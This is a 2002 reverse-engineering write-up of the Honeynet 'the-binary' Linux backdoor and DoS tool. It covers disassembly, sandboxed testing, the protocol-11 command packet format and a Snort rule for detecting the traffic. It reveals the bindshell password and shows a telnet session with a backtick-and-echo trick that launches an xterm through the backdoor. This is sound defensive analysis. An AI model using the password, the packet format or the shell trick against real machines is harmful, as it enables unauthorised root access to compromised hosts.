Analysis: the-binary back door and DOS tool


sean.burford@adelaide.edu.au

29/May/2002

Approach:

  1. Tooling up
  2. The environment
  3. Downloading the binary
  4. Initial examination
  5. Disassembly
  6. Running the-binary
  7. A tool to test the-binary
  8. Decoding the protocol
  9. Working out the bindshell password
  10. Using Snort to detect the-binary command traffic
  11. What we have learnt about the binary

Tooling up

Unix tools: file(1), strings(1), objdump(1), gdb(1), perl(1), make(1L) and gcc(1)

The Reverse Engineers Compiler
REC was used to decompile the-binary to C like structured code, which eased the identification of the program structure.
http://www.backerstreet.com/rec/rec.htm

Fenris
Can be used to regenerate the symbol table of a stripped ELF binary, and do a lot of other reverse engineering tasks.
http://razor.bindview.com/tools/fenris/

User Mode Linux
A reasonably safe environment for running and tracing the-binary.
http://user-mode-linux.sourceforge.net/

TCPDump
To monitor network traffic to and from the-binary, and analyse the DDOS functions.
http://www.tcpdump.org/

libnet
To generate packets to send to the-binary to verify functionality.
http://www.packetfactory.net/Projects/Libnet/

libpcap
To capture response packets from the-binary.
http://www.tcpdump.org/

Snort
A rule for the Snort Network Intrusion Detection System (NIDS) was created to detect control traffic for this binary, and others like it.
http://www.snort.org/

The Environment

The-binary was disassembled with objdump and REC under a standard RedHat Linux 7.1 install. C source was developed on the host using the libnet and libpcap libraries, in order to excercise the functionality of the-binary. User Mode Linux was installed to provide an environment for executing the-binary.

The-binary was tested under User Mode Linux (UML) using a virtual network consisting of addresses in the range 192.168.32.0/24. The infected host was configured at 192.168.32.200, with the client probing from the real host and tcpdump running on the real host. The-binary was largely disassembled before the first test run, to provide some assurance that it would not detect UML and attempt to exploit it to escape to the host OS, or perform other malicious actions. The initial disassembly was also required to determine the packet contents the-binary was expecting.

The drive images used under User Mode Linux where the standard User Mode Linux Debian Minimal and RedHat 7.2 full install drive images where used to provide virtual systems for running and communicating with the-binary.

The host machine on which UML was run did not have any other active network interfaces, to prevent packets slipping out onto public networks.

This environment was designed to prevent network activity from the infected host from escaping beyond the host running the UML system.

Download the-binary and verify MD5 sum

Having downloaded the-binary.tar.gz from project.honeynet.org, I verified the MD5 checksum of the archive with the md5sum command, and it matched that shown on the web site.

Initial examination

The Unix file(1) command was used to identify the binary as a statically linked Linux i386 executable. strings(1) was used to examine the-binary for clues as to its purpose and composition. strings revealed that the-binary was probably linked against "The Linux C library 5.3.12", containing "yplib.c,v 2.6 1994/05/27". This library was present in RedHat Linux 6.2, but not RedHat Linux 6.1 or 7.0, so if this program was linked under RedHat, it was probably under RedHat 6.2. Also present are strings indicating that /bin/csh may be used to execute commands, and that /tmp/.hj237349 may be used at some point.

I ran "objdump -dS the-binary" to get a raw disassembly of the-binary for reference when REC did not produce the level of detail required.

Disassembly

I ran REC against the-binary to try to start finding functions and structure.

Initial disassembly with the Reverse Engineers Compiler, REC, revealed a lot of functions containing the "int 0x80" interrupt instruction. This interrupt is used by programs running under Linux to invoke kernel functions, called System Calls, with a command number in EAX.

There is a list of Linux system calls in usr/include/asm/unistd.h. To determine the likely purpose of the functions in the REC output, I created a Perl script that would search for lines of REC output where EAX was set, followed by an int 0x80, and mark the interrupt with the system call name out of unistd. This script is convert-syscall.pl in files.tar.

Once I had determined the names of some of the library functions within the REC output, I added them to my REC command file. The argument lists for these commands came from their C header files in /usr/include/. At this point, my REC command file looked something like this:

#!wrec
file: the-binary
cpu: i386

option: +hexconst

region: 0x000090 0x01f5d0 0x08048090 text
region: 0x01f5d8 0x024228 0x080675d8 data
region: 0x024228 0x0302ac 0x0806d228 data

##############################
# Standard library functions #
##############################
symbol: 0x0804F620, 0x0804F67F T fopen(char *path, char *mode)
# INCOMPLETE TYPE
symbol: 0x0804F808, 0x0804F81F T sprintf(char *string, char *format)
# INCOMPLETE TYPE
symbol: 0x0804F820, 0x0804F884 T _IO_sprintf(char *string, char *format)
symbol: 0x08055FBC, 0x0805602B T _exit(int n)
symbol: 0x080569FC, 0x08056A2B T wait4(unsigned int pid, int *status, int options, void *rusage)
symbol: 0x08056A2C, 0x08056A71 T accept(int s, void *address, unsigned int *addrlen)
symbol: 0x08056A74, 0x08056AB9 T bind(int sockfd, void *myaddr, unsigned int *addrlen)
symbol: 0x08056ABC, 0x08056B01 T connect(int sockfd, void *serveraddr, unsigned int addrlen)
...

To aid in identifying and verifying further library functions, I downloaded the glibc 5.3.12 source and referred to it when I found a prospective library function.

Had I known of it, I could have avoided this time intensive process by running dress(1) from the Fenris reverse engineering toolkit. Dress can regenerate a stripped symbol table of an ELF executable.

To find main() in the-binary, I examined the output of REC and found the ELF entry point function, labelled "__entry_point__". Reading through this standard function revealed a call to a larger function at 0x08048134, which I assumed to be main().

In main(), the lead up to the first for loop contains calls to various functions and can be represented by the summary below:

  1. if euid is not root, exit.
  2. replace the process name in argv[0] with "[mingetty]"
  3. fork and exit the parent process.
  4. setsid()
  5. fork and exit the parent process.
  6. change to the / directory
  7. close file descriptors 0,1,2
  8. open a socket.
  9. receive datagrams.

I was interested in the encoding and decoding functions mentioned in the challenge questions. decode() was quickly found by examining the function calls following the call to recv() in main(). I looked here because you cannot do much with a command packet before decoding it. encode() was found by searching for the value 0x17 (a key value in the decode() function) in the rest of the disassembly.

The encode and decode functions are loaded into the following memory areas:
0x0804A194-0x0804A1E6: encode(int length, unsigned char *src, unsigned char *dst)
0x0804A1E8-0x0804A2A4: decode(int length, unsigned char *src, unsigned char *dst)
their disassembly with REC was not to hard to follow, and is included in the files I have submitted.

Examining the functions called by the goto statement shortly after the call to decode() revealed that some of them executed shell commands, command 1 returned the PID of any children that the server had forked and command 2 configured the server. The code before the goto revealed the format and usage of the first 4 bytes of the packet.

Running the-binary

Now that I knew that the-binary was a network daemon, and what some of its commands did, I ran the-binary under User Mode Linux. User Mode Linux is a Linux kernel that runs under Linux, allowing you to use a file on the host system as a disk drive containing the filesystem for UML.

When run under User Mode Linux, the-binary changes its process name, as visible in ps, to "[mingetty]". This is the name of a terminal program commonly found running on Unix machines, so this is an attempt to obscure the-binary in the process list. The "top" command still shows the original binary name ("the-binary") and /proc shows the-binary has a single open socket.

the-binary uses IP protocol 11 for communication. This evades simple searches for evidence of a compromise, such as TCP and UDP network scans by nmap, and basic interpretation of netstat output. IP services listening for protocol 11 are shown in the output of "netstat -an" as:

raw        0      0 0.0.0.0:11              0.0.0.0:*               7

A list of supported protocols on a machine can be found by the nmap (http://www.insecure.org/nmap/) protocol scan, however this could be fooled by having the back door send an ICMP protocol unreachable packet in response to malformed command packets. Nmap -sO outputs the following line when it detects protocol 11:

11         open        nvp-ii                  

A tool to test the-binary

Using libnet and libpcap, I put together a tool to construct command packets for the-binary based on the packet format I worked out from the REC disassembly, and another to dump the packets. By throwing these packets at the-binary and observing it with gdb, I was able to work out almost all of the functionality it provides. These two tools are called pingit.c and dumpit.c, and are included in the attached archive. Running tcpdump in another window allowed me to see the DOS floods when they started.

I rewrote pingit.c to accept parameters from the command line. This new program is called the-client, and it allows control of most aspects of packets being sent to the-binary. the-client.c is also included in the attached files. It does not support a couple of the flood request types, and does not properly receive response packets yet.

Decoding the protocol

Using the REC disassembly, and my tools; dumpit, pingit and the-client, I was able to determine the packet format for all 12 commands and responses.

All command and response packets have a standard IP packet header, which specifies protocol 11. The first word of the data area is an unencoded command/response flag. The rest of the data area is encoded using the encode() function detailed elsewhere in this analysis. The first byte is ignored, and can be used to salt the encode() function so that repeated commands have 255 different possible appearances on the wire. The next byte is the command byte, a number between 1 and 12 that specifies the function being called. The rest of the packet is data for the command.

  0x00        0x14        0x16
  +-----------+-----+-----+-----+-----+----...
  | IP Header | XXX | DIR | SLT | CMD | ARGS
  +-----------+-----+-----+-----+-----+----...
offset
0          IP Header
0x14       XXX Unknown
0x15       DIR Direction:  02 Command
                           03 Reponse
                           04 Reponse Continuation
------ Everything after here encoded -------------
0x16       SLT Salt
0x17       CMD Command number
0x18...    ARGS Variable length parameters for CMD

Example packet and response: command 1: status
   Accepts no parameters
     0x00        0x14      0x16
     +-----------+----+----+----+----+----...
     | IP Header | 00 | 02 | XX | 01 |
     +-----------+----+----+----+----+----...
offset
0x17       CMD Command number = 1

   Returns PID of currently executing shell or flood process.
     0x00        0x14      0x16
     +-----------+----+----+----+----+-----+------+-...
     | IP Header | 00 | 02 | XX | 01 | CHL | PID  |
     +-----------+----+----+----+----+-----+------+-...
offset
0x17       CMD Command number = 1
0x18       CHL Flag to indicate if there is a child running
           00 = no child process
           01 = child process
0x19,0x1A  PID Process ID of child process

The rest of the packet formats can be seen in the-client.c and pingit.c

Working out the bindshell password

Examining the REC disassembly of the bindshell function (CMD_06) reveals that a connection is accepted, the string sent by the client is compared with the value 'TfOjG', and if the strings match the remote user is dropped into a shell.

I used the-client to launch the bindshell, and checked the protocol and port on the host running the-binary with netstat -an. I saw a new port had been opened:

tcp        0      0 0.0.0.0:23281           0.0.0.0:*               LISTEN      

As it is TCP, we can use telnet to connect. I connected, and tried the password 'TfOjG', but got no response. Looking at the code, newline characters (0x0a and 0x0d in hex) are translated to '\0', so I tried a few newlines after the password with no luck. Re-examining the disassembly revealed that the password was obfuscated, and that each submitted character was incremented by one before checking. I reconnected and tried the password 'SeNiF' followed by spaces with no luck. I decided to use gdb, to compare the strings myself as the-binary saw them.

The disassembly shows that the code forks twice in CMD_06, once after the function is entered so that the main loop can continue processing other commands, and once after accept is called. This could have made interactive disassembly with gdb difficult, as I had already noticed that follow-fork-mode was ineffective, possibly because the-binary was statically linked. Luckily, just after the second fork recv() is called.

As recv() blocks until it receives input, I connected to the bindshell with telnet. This got the bindshell thread upto the recv() command. Using ps I found the process ID of the forked shell, and fired up gdb.

bash-2.05# ps ax | fgrep mingetty
  417 tts/0    S      0:00 /sbin/mingetty serial/0
  454 ?        S      0:00 [mingetty]  
  507 ?        S      0:00 [mingetty]  
  508 ?        S      0:00 [mingetty]  
(gdb) attach 508
Attaching to process 508
0x08056b74 in ?? ()
(gdb) bt
#0  0x08056b74 in ?? ()
#1  0x080489cf in ?? ()
#2  0x080480eb in ?? ()
(gdb) disassemble 0x080489cf 0x08048a1b
Dump of assembler code from 0x80489cf to 0x8048a1b:
0x80489cf:      xor    %ebx,%ebx
0x80489d1:      add    $0x10,%esp
0x80489d4:      mov    0xffffbc44(%ebx,%ebp,1),%al
0x80489db:      cmp    $0xa,%al
0x80489dd:      je     0x80489e3
0x80489df:      cmp    $0xd,%al
0x80489e1:      jne    0x80489f0
0x80489e3:      movb   $0x0,0xffffbc44(%ebx,%ebp,1)
0x80489eb:      jmp    0x80489fe
0x80489ed:      lea    0x0(%esi),%esi
0x80489f0:      mov    %al,0xffffbc44(%ebx,%ebp,1)
0x80489f7:      incb   0xffffbc44(%ebx,%ebp,1)
0x80489fe:      inc    %ebx
0x80489ff:      cmp    $0x12,%ebx
0x8048a02:      jle    0x80489d4
0x8048a04:      lea    0xffffbc44(%ebp),%esi
0x8048a0a:      mov    $0x8067617,%edi
0x8048a0f:      mov    $0x6,%ecx
0x8048a14:      cld    
0x8048a15:      test   $0x0,%al
0x8048a17:      repz cmpsb %es:(%edi),%ds:(%esi)
0x8048a19:      je     0x8048a44
End of assembler dump.
(gdb) break *0x8048a0f
Breakpoint 1 at 0x8048a0f
(gdb) cont
Continuing.

Typing 'SeNiF' into telnet followed by a few spaces causes the breakpoint to be reached, and I compare the password from the network to the password in the binary:

Breakpoint 1, 0x08048a0f in ?? ()
(gdb) x/10c 0xffffbc44+$ebp
0x9fffb7e8:     84 'T'  102 'f' 79 'O'  106 'j' 71 'G'  33 '!'  33 '!'  33 '!'
0x9fffb7f0:     33 '!'  33 '!'
(gdb) x/10c 0x8067617
0x8067617:      84 'T'  102 'f' 79 'O'  106 'j' 71 'G'  0 '\000'        -1 'ÿ' -5 'û'
0x806761f:      1 '\001'        0 '\000'

So the password is correct. The problem appears to be that 6 characters are compared, and the password is 5 characters, so I needed a trailing null byte. As newlines are translated to null bytes, all I needed to do was press Enter after typing the password. I restarted the bindshell with the-client, and reconnected with telnet and typed SeNiF followed by Enter. This worked, because then when I pressed Enter a second time I got the response ": command not found".

[slide@slide reverse]$ sudo ./the-client -i tap0 -s 192.168.32.1 -d 192.168.32.200 stop
Cmd: 8  Resp?: 0        Bind?: 0        Proto: 11
Body: 400       Wait: 500       Device: tap0    ttl: 250        Unk: 0
Source: 192.168.32.1    Dest: 192.168.32.200
[slide@slide reverse]$ sudo ./the-client -i tap0 -s 192.168.32.1 -d 192.168.32.200 bindshell
Cmd: 6  Resp?: 0        Bind?: 1        Proto: 11
Body: 400       Wait: 500       Device: tap0    ttl: 250        Unk: 0
Source: 192.168.32.1    Dest: 192.168.32.200
STUB: no bindshell support yet
[slide@slide reverse]$ telnet 192.168.32.200 23281
Trying 192.168.32.200...
Connected to 192.168.32.200.
Escape character is '^]'.
SeNiF

: command not found
ls
: command not found
echo hi
hi

As it turns out, the shell is pretty useless because it cannot find any non builtin commands. This can be overcome (if you don't possibly mind giving away your IP address to the owner of the compromised system) by setting xhost on an x-server to allow access from the compromised host and starting an x-term to display on the x-server, eg:

[slide@slide reverse]$ telnet 192.168.32.200 23281
Trying 192.168.32.200...
Connected to 192.168.32.200.
Escape character is '^]'.
SeNiF
echo `/usr/X11R6/bin/xterm -display 192.168.32.254:0`

this exploits the builtin command echo, and the `` quotes that can be used to run a command using the bindshell.

Using Snort to detect the-binary command traffic

As the-binary is controlled by packets using an unusual protocol, I decided that this was a good way to detect the network traffic related to this program and others like it. Since Snort (an Open Source network intrusion detection system) has an easy to use rule system for configuring its alerts, I decided to prototype this with Snort.

Snort is configured using rule files. The rule files list rules that can specify which packets and data flows to match, and what to tell the Snort user about those packets.

At first glance, I could not find any way to specify how to monitor for particular IP protocols in the Snort documentation. A bit of research uncovered the ip_proto keyword. I created and tested the rule:

alert ip $EXTERNAL_NET any <> $HOME_NET 0 (msg:"Traffic on unusual IP protocol" 
; ip_proto: !6; ip_proto: !17; ip_proto: !1; classtype:misc-activity; rev:1;)
which detected the traffic. I tried adding more protocols to the exclusion list, but Snort started detecting all traffic so I left it at that. The greater than (>) operator does not seem to work with ip_proto, and it does not seem to be able to handle lists. In a production environment you would need to ignore 5 or so major protocols (TCP, UDP, ICMP, IGRP, various routing protocols such as OSPF) to cut down on false positives. Protocol numbers are assigned by IANA and available at
http://www.iana.org/assignments/protocol-numbers

What we have learnt about the binary

The-binary is a back door program. It acts as a network server, listening on IP protocol 11. Command and response packets are encoded using a simple cipher.

It provides facilities to execute shell commands using /bin/csh and /bin/sh as root on the compromised system, and the ability to launch a variety of Denial of Service (DOS) attacks.